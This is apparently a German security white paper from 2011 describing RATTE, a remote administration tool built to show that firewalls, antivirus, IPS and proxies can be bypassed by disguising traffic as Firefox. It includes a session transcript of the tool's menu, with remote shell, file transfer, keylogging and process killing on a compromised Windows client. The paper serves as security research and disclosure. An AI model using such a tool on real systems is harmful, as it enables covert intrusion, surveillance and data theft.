Deutsch - Werth IT

White Paper: Breaking Enterprise Security
Ein Unternehmen kann jede IT-Bedrohung mittles moderner IT-Sicherheits-Produkte stoppen,
zumindest behaupten dies für gewöhnlich die Marketing- und Verkaufs- Abteilungen der
Hersteller.
Dieses White Paper präsentiert die Ergebnisse einer Testreihe diverse Sicherheitslösungen und zeigt
dass diese selbst bei einer (verschachtelten Verteidigung in der Tiefe versagen.)???
In den Tests wurde folgendes Netzwerkschema verwendet:
Das Zielsystem war ausgestattet mit einer lokalen Firewall- und Antvirus = Netzwerk-Firewall mit
integrieten AV-Check, Protokoll-Check, Application-Check, Proxy und IPS->Internet->Firewall mit
identischen Sicherheitsmerkmalen->Angriffssystem
Zur Durchführung der Tests wurde das Programm "Remote Administration Toolkit Tommy Edition"
kurz RATTE entwickelt. Dieses Tool nutzt diverse nicht-fortschrittliche Techniken zur Umgehung
der vorhandenen Sicherheitsmaßnahmen. Mittels dieser Techniken konnte RATTE in den Tests
lokale Firewalls (Windows, Outpost und Sophos Firewall wurden getestet), IDS/IPS (Snort), AV
(Avira,Sophos,Fortinet,Antivir), Netzwerk-Firewalls (GenuGate, Fortigate) und Proxys mit
Authentifiziernug (Squid) umgehen.
Eine exemplarische Beispielskonfiguration einer lokalen Firewall wird im Screenshot 1 dargestellt:
Unter “Sperren” sieht man deutlich, dass der Schutz der erlaubten Anwendungen auf “Maximal”
eingestellt ist.
Screenshot 2 zeigt den Mitschnitt einer typischen RATTE-Kommunikation, inklusive Umgehung
der vorhandenen Sicherheitsmaßnahmen:
Das Transkript einer RATTE-Sitzung sieht folgendermaßen aus und veranschaulicht, dass selbst
eine Shell trotz der vorhandenen Sicherheitsmaßnahmen möglich ist:
RATTE Server Menue
1) list clients
2) activate client
3) remove client
4) remove all clients
5) remove&delete Client
99) stop Server
Choose: 1
Warte auf Mutex
Clients:
0) ID:1
HTTP connection from XXX using Ratte 1.4.1
<SystemName>\\<UserName> on <SystemName> running Windows XP Service Pack 2 as Admin
C:\Programme\Mozilla Firefox\firefox.exe
Connected at Mon Feb 14 04:11:14 2011
RATTE Server Menue
1) list clients
2) activate client
3) remove client
4) remove all clients
5) remove&delete Client
99) stop Server
Choose: 2
nr ?
0
send activation request, may take 10 seconds
Client activated
Session Menue
1) start Shell
2) get File from Client
3) send File to Client
4) get Keylog to ./keylog.txt
5) Change Shell User
6) List Processes
7) Kill Process
8) Client bits File Download
99) close Session
Choose: 1
C:\Programme\Mozilla Firefox>
dir
dir
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: XXXX
Verzeichnis von C:\Programme\Mozilla Firefox
14.02.2011
14.02.2011
26.07.2010
26.07.2010
07.05.2009
10:11 <DIR>
.
10:11 <DIR>
..
08:49
0 .autoreg
08:49
17.880 AccessibleMarshal.dll
07:42
1.138 active-update.xml
<...zur besseren Lesbarkeit gekürzt...>
47 Datei(en) 21.044.897 Bytes
13 Verzeichnis(se), 2.069.327.872 Bytes frei
C:\Programme\Mozilla Firefox>
exit
C:\Programme\Mozilla Firefox>
Session Menue
1) start Shell
2) get File from Client
3) send File to Client
4) get Keylog to ./keylog.txt
5) Change Shell User
6) List Processes
7) Kill Process
8) Client bits File Download
99) close Session
Choose: 99
RATTE Server Menue
1) list clients
2) activate client
3) remove client
4) remove all clients
5) remove&delete Client
99) stop Server
Choose: 99
Removing Client an Position 0, may take up to 10 seconds
Shutting down!
Screenshot 3 zeigt das zugehörige Log der Kommunikation, sichtbar innerhalb der lokalen Firewall
unter "erlaubter Datenverkehr":
Das letzte Bild veranschaulicht sehr deutlich, dass die lokale Firewall sich täuschen lässt und
RATTE für den Firefox Browser hält und entsprechend das Regelwerk für den Firefox auf den
Datenverkehr anwendet.
Als Beitrag zur Verbesserung der allgemeinen Wirkung von modernen Sicherheitsprodukten wird
RATTE zusammen mit diesem White Paper veröffentlicht. Somit sind Hersteller und Kunden in der
Lage, die vorhandenen Sicherheitslücken nachzustellen und die Sicherheit nachhaltig zu erhöhen.
Zusätzlich wird ein Video veröffentlicht, dass RATTE in Aktion zeigt, wie es eine vom Bundesamt
für Sicherheit in der Informationstechnik nach EAL 4+ zertifizierte GenuGate Firewall durchbricht.
RATTE wird nur zu Schulungszwecken und ohne Quellcode veröffentlicht. Es darf nicht ohne
schriftliche Einwilligung des Inhabers des Zielsystems benutzt werden!
Fazit:
Moderne Sicherheitslösungen sind zu stark abhängig von signaturbasierter Erkennung, sowie nicht
in der Lage, Datenverkehr korrekt einzustufen, wenn dieser sich an die Protokoll-Standards wie
beispielsweise HTTP hält.
Somit ist ein zuverlässiger Schutz vor "personalisierten" Schadprogrammen nicht gewährleistet.
http://www.genua.de/dateien/pi-genugate6.3-zertifiziert.pdf Pressemittelung zur Zertifizierung der
GenuGate.
http://www.fortinet.com/doc/solutionbrief/firewall_proxy_sol_brief.pdf , Pressemittelung zur
Applikationprüfung in der FortiGate
http://www.av-test.org/certifications?lang=de, AV-Test-Ergebnisse
http://www.marko-rogge.de/ratte.html , Video zu RATTE
http://www.secmaniac.com/ , Social Engineering Toolkit, enthält RATTE (demnächst)
"Die Kunst der digitalen Verteidigung" :
B.2 Entwicklung eines Sicherheitsprüfprogrammes
B.2.1 Umsetzung von Ratle in C++
Kontakt zum Autor wird erbeten über Marko Rogge: [email protected]
Thomas Werth, Februar 2011, V1.1